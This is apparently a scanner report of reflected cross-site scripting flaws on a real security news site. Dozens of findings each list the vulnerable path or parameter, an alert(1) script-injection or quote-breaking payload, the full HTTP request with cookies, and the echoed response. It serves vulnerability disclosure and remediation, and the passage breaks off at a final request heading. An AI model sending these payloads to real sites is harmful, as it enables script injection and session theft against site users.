GET /blog/archives/dark-dominion6d930"><script>alert(1)</script>1a1bb26cd95/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42239'%3b7062af589c1 was submitted in the REST URL parameter 3. This input was echoed as 42239';7062af589c1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/dark-dominion42239'%3b7062af589c1/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title></title> ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1183308/0/16/ADTECH;alias=DarkReading_Blogs_WelcomeAd_1x1;key=/blog/archives/dark-dominion42239';7062af589c1/index;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=1292114128;misc='+new Date().getTime()+'"> ...[SNIP]...
3.409. http://www.darkreading.com/blog/archives/dark-dominion/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/dark-dominion/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9352"><script>alert(1)</script>8e802cda6aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/dark-dominion/index.html?a9352"><script>alert(1)</script>8e802cda6aa=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c839"><script>alert(1)</script>f4468a3776d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/evil-bytes6c839"><script>alert(1)</script>f4468a3776d/index.html HTTP/1.1 Host: www.darkreading.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8def8'%3b326e2baa0c2 was submitted in the REST URL parameter 3. This input was echoed as 8def8';326e2baa0c2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/evil-bytes8def8'%3b326e2baa0c2/index.html HTTP/1.1 Host: www.darkreading.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title></title> ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1183308/0/16/ADTECH;alias=DarkReading_Blogs_WelcomeAd_1x1;key=/blog/archives/evil-bytes8def8';326e2baa0c2/index;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=1292112429;misc='+new Date().getTime()+'"> ...[SNIP]...
3.412. http://www.darkreading.com/blog/archives/evil-bytes/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/evil-bytes/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57599"><script>alert(1)</script>5a3d20f284 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/evil-bytes/index.html?57599"><script>alert(1)</script>5a3d20f284=1 HTTP/1.1 Host: www.darkreading.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef818"><script>alert(1)</script>8452d284f79 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/evil_bytesef818"><script>alert(1)</script>8452d284f79/index.html?subSection=evil_bytes HTTP/1.1 Host: www.darkreading.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7fdfa'%3b44d0fc2211f was submitted in the REST URL parameter 3. This input was echoed as 7fdfa';44d0fc2211f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/evil_bytes7fdfa'%3b44d0fc2211f/index.html?subSection=evil_bytes HTTP/1.1 Host: www.darkreading.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2fd9'%3bdb6c1ae88f3 was submitted in the REST URL parameter 3. This input was echoed as f2fd9';db6c1ae88f3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/hacked-offf2fd9'%3bdb6c1ae88f3/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db19c"><script>alert(1)</script>fc3e30266c0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/hacked-offdb19c"><script>alert(1)</script>fc3e30266c0/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... ng.com%2Fblog%2Farchives%2Fhacked-offdb19c%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Efc3e30266c0%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/hacked-offdb19c"><script>alert(1)</script>fc3e30266c0/index.html"> ...[SNIP]...
3.417. http://www.darkreading.com/blog/archives/hacked-off/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/hacked-off/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc1bc"><script>alert(1)</script>e7f096f3529 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/hacked-off/index.html?fc1bc"><script>alert(1)</script>e7f096f3529=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c331"><script>alert(1)</script>5483cb0977f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/in-search-of-malware8c331"><script>alert(1)</script>5483cb0977f/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f093'%3b3cf75386138 was submitted in the REST URL parameter 3. This input was echoed as 9f093';3cf75386138 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/in-search-of-malware9f093'%3b3cf75386138/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title></title> ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1183308/0/16/ADTECH;alias=DarkReading_Blogs_WelcomeAd_1x1;key=/blog/archives/in-search-of-malware9f093';3cf75386138/index;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=1292114083;misc='+new Date().getTime()+'"> ...[SNIP]...
3.420. http://www.darkreading.com/blog/archives/in-search-of-malware/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/in-search-of-malware/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77497"><script>alert(1)</script>35a57d2cfa5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/in-search-of-malware/index.html?77497"><script>alert(1)</script>35a57d2cfa5=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4768"><script>alert(1)</script>3c958c8b28b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/security-viewse4768"><script>alert(1)</script>3c958c8b28b/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a624d'%3bf74133ddbff was submitted in the REST URL parameter 3. This input was echoed as a624d';f74133ddbff in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/security-viewsa624d'%3bf74133ddbff/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title></title> ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1183308/0/16/ADTECH;alias=DarkReading_Blogs_WelcomeAd_1x1;key=/blog/archives/security-viewsa624d';f74133ddbff/index;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=1292114127;misc='+new Date().getTime()+'"> ...[SNIP]...
3.423. http://www.darkreading.com/blog/archives/security-views/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/security-views/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e627"><script>alert(1)</script>6f043ecd221 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/security-views/index.html?3e627"><script>alert(1)</script>6f043ecd221=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload efcaa'%3b46706480a8 was submitted in the REST URL parameter 3. This input was echoed as efcaa';46706480a8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/sophoslabs-insightsefcaa'%3b46706480a8/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18829"><script>alert(1)</script>ec412ececd3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/sophoslabs-insights18829"><script>alert(1)</script>ec412ececd3/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... chives%2Fsophoslabs-insights18829%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eec412ececd3%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/sophoslabs-insights18829"><script>alert(1)</script>ec412ececd3/index.html"> ...[SNIP]...
3.426. http://www.darkreading.com/blog/archives/sophoslabs-insights/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/sophoslabs-insights/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a122"><script>alert(1)</script>7662bd3a05a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/sophoslabs-insights/index.html?3a122"><script>alert(1)</script>7662bd3a05a=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title></title> ...[SNIP]... -insights%2Findex.html%3F3a122%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7662bd3a05a%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/sophoslabs-insights/index.html?3a122"><script>alert(1)</script>7662bd3a05a=1"> ...[SNIP]...
3.427. http://www.darkreading.com/blog/calendar.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/calendar.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bdc1"><script>alert(1)</script>b2c686c48f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/calendar.html?9bdc1"><script>alert(1)</script>b2c686c48f=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title></title> ...[SNIP]... A%2F%2Fwww.darkreading.com%2Fblog%2Fcalendar.html%3F9bdc1%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb2c686c48f%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/calendar.html?9bdc1"><script>alert(1)</script>b2c686c48f=1"> ...[SNIP]...
3.428. http://www.darkreading.com/newsletters/subscribe.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/newsletters/subscribe.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36893"><script>alert(1)</script>df6bd4613e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsletters/subscribe.html?36893"><script>alert(1)</script>df6bd4613e9=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Dark Read ...[SNIP]... ading.com%2Fnewsletters%2Fsubscribe.html%3F36893%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Edf6bd4613e9%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/newsletters/subscribe.html?36893"><script>alert(1)</script>df6bd4613e9=1"> ...[SNIP]...
3.429. http://www.darkreading.com/security/antivirus [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/antivirus
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfd6f"><script>alert(1)</script>db3cd6751d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/antivirus?cfd6f"><script>alert(1)</script>db3cd6751d1=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Antivirus ...[SNIP]... %2F%2Fwww.darkreading.com%2Fsecurity%2Fantivirus%3Fcfd6f%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Edb3cd6751d1%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/antivirus?cfd6f"><script>alert(1)</script>db3cd6751d1=1"> ...[SNIP]...
3.430. http://www.darkreading.com/security/application-security [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/application-security
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9677"><script>alert(1)</script>9b902f96db0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/application-security?a9677"><script>alert(1)</script>9b902f96db0=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aad7d"><a>9375303c7a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
